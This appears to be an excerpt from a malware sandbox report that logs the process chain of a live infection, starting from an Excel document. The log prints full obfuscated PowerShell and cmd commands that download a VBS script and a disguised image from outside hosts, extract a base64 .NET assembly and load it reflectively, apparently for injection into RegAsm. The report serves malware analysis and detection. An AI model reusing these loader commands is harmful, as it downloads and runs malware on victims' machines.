                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCDF9.tmp" "c:\Users\user\AppData\Local\Temp\mjo4tj0d\CSC1D7DFCB3A844EFFBAC81F2560943E20.TMP"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.SDER/zob/ppmax/551.391.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHeLL.exe -Ex bYPASs -nop -w 1 -c DEvICEcrEDENTiAlDEPlOyMeNT.EXe ; iEX($(ieX('[sYstem.tEXt.ENcODiNG]'+[Char]58+[CHAr]58+'uTF8.GETSTRiNG([sysTem.cOnVert]'+[cHAR]0X3a+[CHaR]58+'fROMbaSe64sTRIng('+[char]34+'JDFIaWVNN24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVyZEVGSW5pVElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRiQm4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpDclZDWnRoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaktGR1Nmd3ZhaVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1uVE9xKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ2UXdRT05JalVjbSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNQWcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMUhpZU03bjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE5My4xNTUveGFtcHAvYm96L3dlY3JlYXRlZGJ1dHRlcnNtb290aGJ1dHRlcnRoaW5ncy50SUYiLCIkRW52OkFQUERBVEFcd2VjcmVhdGVkYnV0dGVyc21vb3RoYnV0dGVydGhpbi52QlMiLDAsMCk7U1RBUlQtc0xFZXAoMyk7c1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVx3ZWNyZWF0ZWRidXR0ZXJzbW9vdGhidXR0ZXJ0aGluLnZCUyI='+[cHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wecreatedbuttersmoothbutterthin.vBS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES89F7.tmp" "c:\Users\user\AppData\Local\Temp\imlwlgjg\CSCE8D62BF91CF49AAAEBCC2A37BB3C45C.TMP"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? 